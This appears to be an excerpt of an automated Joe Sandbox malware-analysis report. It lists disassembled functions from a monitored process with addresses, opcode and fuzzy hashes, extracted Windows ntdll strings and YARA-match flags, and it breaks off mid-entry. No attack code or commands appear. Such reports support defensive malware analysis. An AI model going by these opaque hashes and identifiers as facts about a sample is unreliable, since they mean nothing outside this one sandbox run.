                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                  • API String ID: 48624451-2108815105
                                                                                                                                                                                  • Opcode ID: c2d34ac945a33e01b04a8ec8653d19b6171eefd892ccf13592b447371ddb1e36
                                                                                                                                                                                  • Instruction ID: 08e0d7b6c9eb29df1883b52f33894d38ec03fe4c886f20b7996825ad07aedf8d
                                                                                                                                                                                  • Opcode Fuzzy Hash: c2d34ac945a33e01b04a8ec8653d19b6171eefd892ccf13592b447371ddb1e36
                                                                                                                                                                                  • Instruction Fuzzy Hash: BB51E5A5A00116BFDB51DB9C8C809BEFBF8BB08640B14816DF5D9D7A45D374DE048BA0
                                                                                                                                                                                  Function 01132410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                  • API String ID: 48624451-2108815105
                                                                                                                                                                                  • Opcode ID: 70afcaf683a62cf522a4ecec2aac5b4b73974e654ccef254fbc376a2ef42ea10
                                                                                                                                                                                  • Instruction ID: 1a7d08cffb5de6faea4249717a3473130f4d0d32e7806a0f73c9f429f02c4ced
                                                                                                                                                                                  • Opcode Fuzzy Hash: 70afcaf683a62cf522a4ecec2aac5b4b73974e654ccef254fbc376a2ef42ea10
                                                                                                                                                                                  • Instruction Fuzzy Hash: 46510971A04745AEDB38EF5CC8909BFBBF8EF84200B448459E5DAD7689D7B4EA40C760
                                                                                                                                                                                  Function 010B7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 010F46FC
                                                                                                                                                                                  • ExecuteOptions, xrefs: 010F46A0
                                                                                                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 010F4725
                                                                                                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 010F4742
                                                                                                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 010F4787
                                                                                                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 010F4655
                                                                                                                                                                                  • Execute=1, xrefs: 010F4713
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                  • API String ID: 0-484625025
                                                                                                                                                                                  • Opcode ID: 2287c66e2274d013f7339f044fffa0449b21f5c3e0fd30b0a94a3029fb6fd840
                                                                                                                                                                                  • Instruction ID: 8580cd0a3ef20cc38327123b3428a9ad663941a9626619f2f98fe76e5db42c8c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2287c66e2274d013f7339f044fffa0449b21f5c3e0fd30b0a94a3029fb6fd840
                                                                                                                                                                                  • Instruction Fuzzy Hash: 60510A3164021A6AEB25AB68DCC6FEE77B8FF98704F0400EDD685AB1D1D7709A45CF50
                                                                                                                                                                                  Function 01156940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                                                                  • Instruction ID: a5a2a2520551f2d0674fea2fcb86315a31b5a85b0fcc818a85bd783756ff4200
                                                                                                                                                                                  • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 04021571508342AFD359CF28C890A6FBBE5EFC8704F54892DF9A54B264DB31E945CB82
                                                                                                                                                                                  Function 010CB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                                                  • String ID: +$-$0$0
                                                                                                                                                                                  • API String ID: 1302938615-699404926
                                                                                                                                                                                  • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                                  • Instruction ID: 565991f5a84cc811990774e0501e5789307d9e90659fd9da6ded81411b8385b5
                                                                                                                                                                                  • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                                  • Instruction Fuzzy Hash: 92818D70E052499EEF258F6CC8527EEBBE1AF45BA0F18429DD8D1A7291C7389841CF51
                                                                                                                                                                                  Function 011320E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                                  • String ID: %%%u$[$]:%u
                                                                                                                                                                                  • API String ID: 48624451-2819853543
                                                                                                                                                                                  • Opcode ID: 7db3ffe277b0ea9d20c5b4ba4b995e5c467f9a1e1c9fe413d7f1e2171124ccad
                                                                                                                                                                                  • Instruction ID: fa971edff0f732f0dd21dc2c6fa3192b6399ee27de4c59c062fa6d7d1b945f9a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7db3ffe277b0ea9d20c5b4ba4b995e5c467f9a1e1c9fe413d7f1e2171124ccad
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8621657AE00219ABDB24EF79CD40AFEBBF8EF94640F04011AE945D7204E730D9018BE1
                                                                                                                                                                                  Function 010AF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 010F031E
                                                                                                                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 010F02E7
                                                                                                                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 010F02BD
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                  • API String ID: 0-2474120054
                                                                                                                                                                                  • Opcode ID: 43d919c549a71b25129a90c407b0240854fead309e5d47d116462c5c4346a12d
                                                                                                                                                                                  • Instruction ID: dca3e31ebd55f8a39e541d04e3598202a79e495d0c1237423bda084d407f6697
                                                                                                                                                                                  • Opcode Fuzzy Hash: 43d919c549a71b25129a90c407b0240854fead309e5d47d116462c5c4346a12d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 22E1FF306087429FE765CF68C881B6EBBE1BB88314F144A6DF6E58B6D2D774D844CB42
                                                                                                                                                                                  Function 010BBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 010F7BAC
                                                                                                                                                                                  • RTL: Resource at %p, xrefs: 010F7B8E
                                                                                                                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 010F7B7F
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                  • API String ID: 0-871070163
                                                                                                                                                                                  • Opcode ID: caeff3ed2909aff43a3e8109ce504836a8e89d4bf38e672992f31188647ddbab
                                                                                                                                                                                  • Instruction ID: ee38f48ee75ca746dff0801b9ca22ad25d9d87a5bcc66931b0bc15924dba093f
                                                                                                                                                                                  • Opcode Fuzzy Hash: caeff3ed2909aff43a3e8109ce504836a8e89d4bf38e672992f31188647ddbab
                                                                                                                                                                                  • Instruction Fuzzy Hash: B04103317047038FD725DE29C881BAAB7E5EF89710F000A5DEAD6DB680DB72E405CB92
                                                                                                                                                                                  Function 010BB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010F728C
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 010F72C1
                                                                                                                                                                                  • RTL: Resource at %p, xrefs: 010F72A3
                                                                                                                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 010F7294
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                  • API String ID: 885266447-605551621
                                                                                                                                                                                  • Opcode ID: 225126f494d391e02521fdfbff1176ce8bfee734009b8b854aa6451e67513aab
                                                                                                                                                                                  • Instruction ID: 6b34566efaf609cbc033f023429df6feb55d21bcc59cf065ac6474823284b63f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 225126f494d391e02521fdfbff1176ce8bfee734009b8b854aa6451e67513aab
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6841F035600203ABD765DE29CC82FAAB7E5FB54710F10461DFAD5AB680DB21E8028BD2
                                                                                                                                                                                  Function 01132300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                                  • String ID: %%%u$]:%u
                                                                                                                                                                                  • API String ID: 48624451-3050659472
                                                                                                                                                                                  • Opcode ID: 87b97d05edc11ab839f573fbf39cf5299759e8886aa2242a2180092def4dd03c
                                                                                                                                                                                  • Instruction ID: 03f516b2222179af8eb517738fe2e067a1fecaee5464c3e6a0241b6a24e91b48
                                                                                                                                                                                  • Opcode Fuzzy Hash: 87b97d05edc11ab839f573fbf39cf5299759e8886aa2242a2180092def4dd03c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 13318672A002199FDB24DF2DCC40BEE77F8EB44610F44455AE949E3204EB30AA448FA0
                                                                                                                                                                                  Function 010C7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                                                  • String ID: +$-
                                                                                                                                                                                  • API String ID: 1302938615-2137968064
                                                                                                                                                                                  • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                                  • Instruction ID: 9eac759cf03cbab8174b35a091a4dda483e5895753ba152793a1bf840550f1b3
                                                                                                                                                                                  • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                                  • Instruction Fuzzy Hash: 62919071E0021A9BEB64DF6DC8816BEBBF5BF44B20F24855EE995E72C0D73099428F11
                                                                                                                                                                                  Function 01089126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: $$@
                                                                                                                                                                                  • API String ID: 0-1194432280
                                                                                                                                                                                  • Opcode ID: 102bd670b72ce75debb7bb90ec0b55459026eadf33aefb69c74784d0b5d9779e
                                                                                                                                                                                  • Instruction ID: 081af244bdf6d8a74a0b9bab43b3cf8218a517e85957d7b716512119dbf3156f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 102bd670b72ce75debb7bb90ec0b55459026eadf33aefb69c74784d0b5d9779e
                                                                                                                                                                                  • Instruction Fuzzy Hash: CA812A72D042699FDB35DB54CC44BEEBBB8AB48754F0041EAEA59B7240D7309E84CFA0

                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                  Function 032D867B Relevance: 39.1, Strings: 31, Instructions: 380COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_3010000_neghZqrDWkxUmu.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: !$x$ Z$*S$/K$0$8$8O$8^$;$=$?Q$E $Ew$G,$Ij$Jp$MH$Q$V$VV$Xl$[$kt$m=$q:$t$~"$3$i$n
                                                                                                                                                                                  • API String ID: 0-1445620207
                                                                                                                                                                                  • Opcode ID: 6d11116aa7add2cda7e06ab2305dbeb73278566f0982d6bb6f0e8bcb978a167a
                                                                                                                                                                                  • Instruction ID: 74b3f79759c23107358cf449e4290338b7e1f43075bfd31edc232c3d20733e7d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d11116aa7add2cda7e06ab2305dbeb73278566f0982d6bb6f0e8bcb978a167a
                                                                                                                                                                                  • Instruction Fuzzy Hash: EF228BB0D15229CBEB24CF94C994BDDBBB1BB44308F1081DAD15D6B280D7B91AC9CF95
                                                                                                                                                                                  Function 032E620E Relevance: 6.4, Strings: 5, Instructions: 153COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_3010000_neghZqrDWkxUmu.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 6$O$S$\$s
                                                                                                                                                                                  • API String ID: 0-3854637164
                                                                                                                                                                                  • Opcode ID: 68820c59c3e0480e568da874a70f4cf54d414485ef164f05d21e27b11528c7d0
                                                                                                                                                                                  • Instruction ID: e8a4f757565c51cdeeef78eb779c302902e5ca5a7494510d15e0c115697ee51a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 68820c59c3e0480e568da874a70f4cf54d414485ef164f05d21e27b11528c7d0
                                                                                                                                                                                  • Instruction Fuzzy Hash: AD51A0B6D10218AFDB10DF94DC85BFEF378EF54710F4441A9EA096A140E7B45AD88BA1
                                                                                                                                                                                  Function 032D1B17 Relevance: .1, Instructions: 132COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_3010000_neghZqrDWkxUmu.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: c74a4fa132a45b5802e5695393bcbf915155c3a3052718cd5c5cd2e452b3aeb8
                                                                                                                                                                                  • Instruction ID: 56750c22203233e06047e41e9ad94ef0e26bce2d60f10665d813e80f9bb84f71
                                                                                                                                                                                  • Opcode Fuzzy Hash: c74a4fa132a45b5802e5695393bcbf915155c3a3052718cd5c5cd2e452b3aeb8
                                                                                                                                                                                  • Instruction Fuzzy Hash: 48410BB1D11219AFDB54CF99CC81AEEBBBCEF48710F10415AFA18E7240E7B19650CBA4
                                                                                                                                                                                  Function 032F6B6E Relevance: .1, Instructions: 85COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_3010000_neghZqrDWkxUmu.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: fd18ede5e082a928aa382c2c8b8d36fe834c1915f6e1aba8471b77d87df0642e
                                                                                                                                                                                  • Instruction ID: 3c1e8ed9d00e29fb99d4b7a9d07af01691cd2a38cee420c1aee69c21526e097e
                                                                                                                                                                                  • Opcode Fuzzy Hash: fd18ede5e082a928aa382c2c8b8d36fe834c1915f6e1aba8471b77d87df0642e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 40312BB5A10248AFDB14DF58D881EEFB7B9EF88300F108219FA19A7240D770A955CBA1
                                                                                                                                                                                  Function 032F750E Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_3010000_neghZqrDWkxUmu.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: ea10cc7dd48840645c9b51909ace7f5257caa59e643b13e69d488f833b700645
                                                                                                                                                                                  • Instruction ID: cdc9605ed5eceb539de5f31216043167d95aa362fc7584a94bc1e964c881ba63
                                                                                                                                                                                  • Opcode Fuzzy Hash: ea10cc7dd48840645c9b51909ace7f5257caa59e643b13e69d488f833b700645
                                                                                                                                                                                  • Instruction Fuzzy Hash: CC211BB5A10349AFDB14DF58C841EEFB7B9EF89300F004519FE19A7240D770A955CBA1
                                                                                                                                                                                  Function 032E604E Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_3010000_neghZqrDWkxUmu.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 18dd89190c4dd02556f49eeadb09e87657c22edfcc75a06ffbae778af5e7877e
                                                                                                                                                                                  • Instruction ID: 51a9fa5676ebf3b6581fb8d114596d62ffedb33f6f43902df01fd0c94e1cd059
                                                                                                                                                                                  • Opcode Fuzzy Hash: 18dd89190c4dd02556f49eeadb09e87657c22edfcc75a06ffbae778af5e7877e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7411C2B63903197BF730EA598C43FAB736C9B84B50F244014FB09AE2C0D6E5F85146B5
                                                                                                                                                                                  Function 032F67FE Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_3010000_neghZqrDWkxUmu.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 8977b60b1e4ca3a321a9bf3ce11d33ab56fb9a2aec7fd740b9404135b1466e10
                                                                                                                                                                                  • Instruction ID: 269d2a8fd1ef7ff9b6a64ccec809a37032d32a5c7453a0b3fef725928d6aba1f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8977b60b1e4ca3a321a9bf3ce11d33ab56fb9a2aec7fd740b9404135b1466e10
                                                                                                                                                                                  • Instruction Fuzzy Hash: 23117C75610348AFD724EB64CC41FAFB7ADEB85700F008519FA196B240D7B16956CBA1
                                                                                                                                                                                  Function 032F697E Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_3010000_neghZqrDWkxUmu.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: d6b6faa39021ec0f89dec0e82c419390255c2bee2eadf6448f0dc7d14c5aeebe
                                                                                                                                                                                  • Instruction ID: 67cf4abc36c7ff12b25b00548734bd7369bd853c9c1242a5b6e5d928d3e6bee5
                                                                                                                                                                                  • Opcode Fuzzy Hash: d6b6faa39021ec0f89dec0e82c419390255c2bee2eadf6448f0dc7d14c5aeebe
                                                                                                                                                                                  • Instruction Fuzzy Hash: 67115E75610348BFD720EB64CC41FEFB7ADEF85600F004519FA596B241D7B06955CBA1
                                                                                                                                                                                  Function 032F341E Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_3010000_neghZqrDWkxUmu.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 81740f90857b7eab11b68f6208bd145149435a9f7591167ca45a8c6bc7f8234f
                                                                                                                                                                                  • Instruction ID: e8c6c9f2f5d6030da00d987603f7eb194a03b9038d9d5dd4a0f46f574529f639
                                                                                                                                                                                  • Opcode Fuzzy Hash: 81740f90857b7eab11b68f6208bd145149435a9f7591167ca45a8c6bc7f8234f
                                                                                                                                                                                  • Instruction Fuzzy Hash: E52130B6D11219AF8B00DFA9D9409EFB7F9FF88200F14826AE915E7204E7705A05CFE0
                                                                                                                                                                                  Function 032F475E Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_3010000_neghZqrDWkxUmu.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 6244e3802422d4aaf5d7ba63a7fa99d18dda593d8c0b8a8e76b7f335fb380647
                                                                                                                                                                                  • Instruction ID: 2af10235819dbf702bc853e51ce2d11583fe7e9688a71ab92cf8433ed05db575
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6244e3802422d4aaf5d7ba63a7fa99d18dda593d8c0b8a8e76b7f335fb380647
                                                                                                                                                                                  • Instruction Fuzzy Hash: 441112B6D1121DAF9B00DFA9DD409EFB7F9FF48200F14466AE915E7200E7705A148BA1
                                                                                                                                                                                  Function 032F787E Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
